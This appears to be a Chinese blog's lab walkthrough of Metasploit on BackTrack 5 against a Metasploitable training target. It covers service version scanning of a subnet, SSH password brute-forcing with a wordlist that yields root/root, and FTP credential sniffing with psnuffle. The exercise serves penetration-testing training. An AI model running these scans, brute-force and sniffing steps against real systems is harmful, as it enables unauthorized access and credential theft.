Bt5服务扫描与查点

版权声明:转载原创文章请以超链接形式请注明原文章出处,尊重作者,尊重原创!


恰饭广告




实验之前请先阅读这篇文章:https://www.idaobin.com/explain

任务描述:
服务扫描与查点 p115

任务环境说明:

攻击机:BT5
靶机:Linux Metasploitable 网关服务器
测试机:OWASP主机
攻击机安装服务/工具1:telnet
攻击机安装服务/工具2:ssh
测试机安装服务/工具3:ftp
攻击机安装服务/工具4:

实现步骤:

1.    代码清单3-18 Metasploitable中的服务查点辅助模块;

search name:version

服务查点辅助模块
参数:
search name:version 列出所有可用的服务查点模块

2.    代码清单3-19 telnet 服务查点;

use auxiliary/scanner/telnet/telnet_version
set RHOSTS 10.10.10.0/24
set THREADS 100
run

telnet服务查点

扫描发现10.10.10.254开放了telnet服务,操作系统为ubuntu8.04 主机名为metasploitable

3.    代码清单3-20 SSH 服务扫描与查点;

use auxiliary/scanner/ssh/ssh_version
set RHOSTS 10.10.10.0/24
set THREADS 100
run

ssh服务查点

扫描发现10.10.10.129和10.10.10.254开放了SSH服务 并显示了服务软件和版本号

4.    代码清单3-21 Oracle服务查点模块;

use auxiliary/scanner/oracle/tnslsnr_version
set RHOSTS 10.10.10.0/24
set THREADS 100
run

oracle服务查点

扫描发现10.10.10.130开放了Oracle数据库,并获取了操作系统和版本号


5.    代码清单3-23 SSH服务弱口令猜测

    1)创建密码字典文件

touch /root/words.txt

密码字典的写法:一个密码写在一行上

    2)弱口令猜测

use auxiliary/scanner/ssh/ssh_login
set RHOSTS 10.10.10.254
set USERNAME root
set PASS_FILE /root/words.txt
set THREADS 50
run

ssh暴力破解

结果:获取到10.10.10.254的账号和密码分别为root和root
参数:
set USERNAME root 指定用户名为root
set PASS_FILE 使用字典文件进行弱口令探测

    3)ssh远程登录验证

ssh 10.10.10.254

ssh登录测试

参数:
ssh ip  不指定用户名,默认为root 只需输入密码
-l 指定用户
-p指定密码
uname 显示当前系统的信息
-a 显示全部信息
通过uname -a命令验证是否已经远程登录到服务器

6.    代码清单3-24 通过嗅探获取FTP用户名和口令
    1)OWASP主机通过ftp登录靶机

ftp
open 10.10.10.254

ftp登录测试
参数:
 ftp 运行ftp服务器
 open ip 与相关的ftp服务器连接
 bye 退出ftp服务器

     2)攻击机BT5捕获密码

使用psnuffle口令嗅探工具,截取协议中的身份验证过程,并记录下用户名和密码

use auxiliary/sniffer/psnuffle
run

psnuffle口令嗅探

实验中嗅探到FTP的用户和密码分别为msfadmin和msfadmin

注意:运行run以后,去靶机登录ftp工具才能截取到用户和密码

原文链接:https://www.idaobin.com/archives/647.html

让我恰个饭吧.ヘ( ̄ω ̄ヘ)

支付宝 ——————- 微信
图片加载中图片加载中



恰饭广告

发表评论

电子邮件地址不会被公开。 必填项已用*标注

9 + 1 =